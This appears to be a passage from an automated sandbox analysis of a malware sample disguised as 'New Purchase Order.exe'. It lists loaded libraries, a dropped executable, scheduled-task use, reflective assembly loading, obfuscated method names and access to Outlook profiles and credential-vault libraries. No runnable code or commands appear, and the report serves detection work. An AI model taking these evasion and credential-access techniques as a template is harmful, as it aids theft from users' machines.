            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wdscore.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\New Purchase Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: New Purchase Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: New Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: setupugc.pdb source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000002.4111164419.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kdFPsEWDpy.exe, 00000010.00000002.4110547247.000000000095E000.00000002.00000001.01000000.0000000D.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4110594599.000000000095E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New Purchase Order.exe, 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1910699231.0000000003553000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1912560633.000000000370D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New Purchase Order.exe, New Purchase Order.exe, 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000011.00000002.4112093368.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1910699231.0000000003553000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000011.00000002.4112093368.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000011.00000003.1912560633.000000000370D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: New Purchase Order.exe, 00000008.00000002.1910720585.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000002.4111164419.0000000000E88000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: New Purchase Order.exe, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: ibDqDkseW.exe.0.dr, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.cs .Net Code: SLGn55YnVj System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pqSMjOU71QL7efIRAR.cs .Net Code: SLGn55YnVj System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New Purchase Order.exe.7280000.5.raw.unpack, pqSMjOU71QL7efIRAR.cs .Net Code: SLGn55YnVj System.Reflection.Assembly.Load(byte[])
            Source: 17.2.setupugc.exe.3eecd14.2.raw.unpack, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 20.0.kdFPsEWDpy.exe.2d4cd14.1.raw.unpack, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 20.2.kdFPsEWDpy.exe.2d4cd14.1.raw.unpack, Form1.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0041A857 push DD2CA9E8h; retf 8_2_0041A85D
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0040D20D push esp; ret 8_2_0040D258
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_004032C0 push eax; ret 8_2_004032C2
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0040ABA3 push esi; ret 8_2_0040ABA4
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_00408433 push eax; iretd 8_2_00408434
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_00417D95 push ds; ret 8_2_00417D97
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_00418EE1 pushfd ; ret 8_2_00418F06
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0041A68C push 00000063h; retf 8_2_0041A68E
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0110225F pushad ; ret 8_2_011027F9
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_011027FA pushad ; ret 8_2_011027F9
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_011309AD push ecx; mov dword ptr [esp], ecx 8_2_011309B6
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0110283D push eax; iretd 8_2_01102858
            Source: C:\Users\user\Desktop\New Purchase Order.exe Code function: 8_2_0110135E push eax; iretd 8_2_01101369
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe Code function: 14_2_014DC54D pushfd ; ret 14_2_014DC54E
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe Code function: 14_2_014DC54F push 8B014667h; ret 14_2_014DC554
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe Code function: 14_2_014DC9D7 push edi; ret 14_2_014DC9D9
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe Code function: 14_2_014909AD push ecx; mov dword ptr [esp], ecx 14_2_014909B6
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe Code function: 14_2_0146135E push eax; iretd 14_2_01461369
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe Code function: 14_2_01461FEC push eax; iretd 14_2_01461FED
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe Code function: 14_2_014E7E99 push ecx; ret 14_2_014E7EAC
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe Code function: 14_2_0042DA0C push esi; retf 14_2_0042DA2F
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_038C225F pushad ; ret 17_2_038C27F9
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_038C27FA pushad ; ret 17_2_038C27F9
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_038F09AD push ecx; mov dword ptr [esp], ecx 17_2_038F09B6
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_038C283D push eax; iretd 17_2_038C2858
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_038C1368 push eax; iretd 17_2_038C1369
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_02E703F2 push ss; iretd 17_2_02E703F6
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_02E703BE push ebp; iretd 17_2_02E703CB
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_02E6C36D push edx; iretd 17_2_02E6C36E
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_02E624EA push ebx; retf 17_2_02E624EB
            Source: C:\Windows\SysWOW64\setupugc.exe Code function: 17_2_02E70400 push ds; retf 17_2_02E70403
            Source: New Purchase Order.exe Static PE information: section name: .text entropy: 7.890776799320837
            Source: ibDqDkseW.exe.0.dr Static PE information: section name: .text entropy: 7.890776799320837
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, jF2en7aHZWyRBJ0Q8c.cs High entropy of concatenated method names: 'b73NVtL3tX', 'mo0NjyAv2K', 'AfKNLQ8mpR', 'vIcNKTJjGq', 'XYgNRrPkk8', 'tANNPPFy03', 'D5INUQax0d', 'pKlNJ7EBf2', 'a5mNti2N75', 'lrlNywabal'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pZ8VsZpbIyXWRi4xmL.cs High entropy of concatenated method names: 'He9Lg9bYPa', 'm4ZL485f5n', 'IsYLQLoame', 'K74Lp7hIfs', 'cPhLfTBhhh', 'ONKLrMjGPE', 'rakL6TSBKq', 'wpeLNGduWv', 'mjmL7UhW3l', 'qPrLOdW5Cf'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, AmpewrzqopynfUd9IQ.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jVd7WiWO7U', 'tuY7fCut2Z', 'uIx7rJ2gS0', 'LBb76VrIRQ', 'ESI7NmM5Cv', 'KLF77My1SR', 'QHt7OLNVjP'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, yjihqph90VT05xOHal.cs High entropy of concatenated method names: 'erjRGcWlvm', 'cjdRjXBCPp', 'E5URK8qXfe', 'pMxRPtDeO5', 'g2wRUtkgJc', 'W9EKCKdXt7', 'wAvKHIP7sU', 'mw9KqdUjNN', 'mpQKaNCOrj', 'iThKF5pyTs'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, HZy5SBkh2W02yWXDLN.cs High entropy of concatenated method names: 'j8aWQyWCMB', 'dENWpXGZ9S', 'dcpWhnNMVf', 'w7UWAyZn1b', 'zI8WuRDZ98', 'Kj3W3I0XWr', 'NjnWSaX2a8', 'oVXWbHkqcH', 'Tg5W12lBsX', 'u0pW8mEYXY'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, FIWHVHS5suerTBVvIO.cs High entropy of concatenated method names: 'FZnPVII5V8', 'ep0PLpYuvU', 'xV5PRZXDk4', 'J1YRXgvArg', 'cMGRzDXvor', 'JeTPiKZUVY', 'xe8PdpIJZS', 'tDMPwnpX4w', 'JVjP2bKIwP', 'kJJPn9Mr3S'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, epK78uX9OTwa4D0L5y.cs High entropy of concatenated method names: 'cHK7d26un8', 'Rod72TeVOm', 'OUA7nS2MRf', 'JBk7VJpTtp', 'Md27jHVtu9', 'uDE7KlLWFh', 'tqk7RDevs2', 'PXaNqF1xKg', 'q2nNa0pB2u', 'ssJNFeNfcb'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, XY923XnGuNCejkYu1L.cs High entropy of concatenated method names: 'jlIdPRGX8w', 'oIDdU9wFOo', 'QbIdtyXWRi', 'BxmdyLkcOh', 'EpOdfdgBji', 'Gqpdr90VT0', 'CjKpF6NacvkSPUdcJD', 'YlwsPfCw2QpANjbu6Y', 'VqFddKqI7a', 'GtMd2g88vF'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, ExRvkTwyDRY3WDaugW.cs High entropy of concatenated method names: 'xq75SoF65', 'MBpg5fnMH', 'WvJ4S61wx', 'X0uTeSNM3', 'S2Xpk1nbX', 'rRhYCdNE6', 'uybUUEAmlW01ueGk5w', 'Bm0PwbZLyFuyeF6JkJ', 'q1rNHPG1v', 'QO4OHUyKi'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, boMgoaHflWSYD8hTXl.cs High entropy of concatenated method names: 'Ula6a9WT6R', 'Y1G6XKv1Su', 'cQyNiraIQo', 'BwtNdvXovc', 'NhX68ytdb3', 'wLq6lwmQkM', 'bIH6kRRv0e', 'Vr56ZPWSFh', 'bLS69gP3cj', 'YJx6myARiJ'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, zIShGKFVU7XNWg2Mgi.cs High entropy of concatenated method names: 'xQGNhrBfPJ', 'scINAcq2ZT', 't4mN02s7GY', 'uLnNu8rW1C', 'uBVNZs3aVb', 'GxbN33i05B', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, wRGX8wQWID9wFOoes1.cs High entropy of concatenated method names: 'sukjZQQ0Mk', 'Yjuj9EgEqu', 'W6vjmknPmy', 'EIYjDv4ABC', 'YBgjCQ1Hp7', 'remjH0pyrX', 'DGljqcNLKW', 'uHNja0Wbx5', 'NUujFHkjjS', 'E6NjXNQ6W7'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, SaOS2Yx9nqj2m77EVd.cs High entropy of concatenated method names: 'wI0PekqJ4x', 'UuvPBeQgBr', 'O0RP5cFRd1', 'RolPgdlDVF', 'EbBPsHSyhp', 'zTmP4HAq7d', 'fKQPTFg3vZ', 'pLXPQuZR77', 'y9HPpb3b83', 'zj4PYFsCeg'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, pqSMjOU71QL7efIRAR.cs High entropy of concatenated method names: 'V932Gkqpgh', 'aBl2VLocvS', 'bfg2jfu3J7', 'USq2Lv6wXT', 'VtV2KWy5gF', 'RpS2RGK6qa', 'V7U2Peyj1H', 'tsd2UTeRp5', 'N4K2JossHA', 'Y5w2t1ZsbP'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, d6lgf2jMUmLwVZlh7E.cs High entropy of concatenated method names: 'Dispose', 'P2idFWPtm6', 'WcpwAab5t1', 'EK5ee3ahRY', 'PPFdX2en7H', 'RWydzRBJ0Q', 'ProcessDialogKey', 'Oc5wiIShGK', 'fU7wdXNWg2', 'wgiwwnpK78'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, Gn1myqd2XhOdEBacnrW.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D5yOZFlQdy', 'i7TO9kXKgs', 'u7IOmLZQRu', 'rtpODclqgj', 'eswOCEN6XA', 'm8MOHWUc53', 'EL0OqK09IQ'
            Source: 0.2.New Purchase Order.exe.3e28480.3.raw.unpack, VBLyFcdi5PPNAqTca6G.cs High entropy of concatenated method names: 'aK57eACnOx', 'aUa7BoZBeH', 'U8A75JmFVm', 'a8o7gIfr6V', 'mO27s4wbTZ', 'QXU74VFrO1', 'Fge7TSKk8y', 'YbZ7QMHTQC', 'rMI7psu1b1', 'cvC7YPpwOM'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, jF2en7aHZWyRBJ0Q8c.cs High entropy of concatenated method names: 'b73NVtL3tX', 'mo0NjyAv2K', 'AfKNLQ8mpR', 'vIcNKTJjGq', 'XYgNRrPkk8', 'tANNPPFy03', 'D5INUQax0d', 'pKlNJ7EBf2', 'a5mNti2N75', 'lrlNywabal'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, pZ8VsZpbIyXWRi4xmL.cs High entropy of concatenated method names: 'He9Lg9bYPa', 'm4ZL485f5n', 'IsYLQLoame', 'K74Lp7hIfs', 'cPhLfTBhhh', 'ONKLrMjGPE', 'rakL6TSBKq', 'wpeLNGduWv', 'mjmL7UhW3l', 'qPrLOdW5Cf'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, AmpewrzqopynfUd9IQ.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jVd7WiWO7U', 'tuY7fCut2Z', 'uIx7rJ2gS0', 'LBb76VrIRQ', 'ESI7NmM5Cv', 'KLF77My1SR', 'QHt7OLNVjP'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, yjihqph90VT05xOHal.cs High entropy of concatenated method names: 'erjRGcWlvm', 'cjdRjXBCPp', 'E5URK8qXfe', 'pMxRPtDeO5', 'g2wRUtkgJc', 'W9EKCKdXt7', 'wAvKHIP7sU', 'mw9KqdUjNN', 'mpQKaNCOrj', 'iThKF5pyTs'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, HZy5SBkh2W02yWXDLN.cs High entropy of concatenated method names: 'j8aWQyWCMB', 'dENWpXGZ9S', 'dcpWhnNMVf', 'w7UWAyZn1b', 'zI8WuRDZ98', 'Kj3W3I0XWr', 'NjnWSaX2a8', 'oVXWbHkqcH', 'Tg5W12lBsX', 'u0pW8mEYXY'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, FIWHVHS5suerTBVvIO.cs High entropy of concatenated method names: 'FZnPVII5V8', 'ep0PLpYuvU', 'xV5PRZXDk4', 'J1YRXgvArg', 'cMGRzDXvor', 'JeTPiKZUVY', 'xe8PdpIJZS', 'tDMPwnpX4w', 'JVjP2bKIwP', 'kJJPn9Mr3S'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, epK78uX9OTwa4D0L5y.cs High entropy of concatenated method names: 'cHK7d26un8', 'Rod72TeVOm', 'OUA7nS2MRf', 'JBk7VJpTtp', 'Md27jHVtu9', 'uDE7KlLWFh', 'tqk7RDevs2', 'PXaNqF1xKg', 'q2nNa0pB2u', 'ssJNFeNfcb'
            Source: 0.2.New Purchase Order.exe.3da0660.2.raw.unpack, XY923XnGuNCejkYu1L.cs High entropy of concatenated method names: 'jlIdPRGX8w', 'oIDdU9wFOo', 'QbIdtyXWRi', 'BxmdyLkcOh', 'EpOdfdgBji', 'Gqpdr90VT0', 'CjKpF6NacvkSPUdcJD', 'YlwsPfCw2QpANjbu6Y', 'VqFddKqI7a', 'GtMd2g88vF'
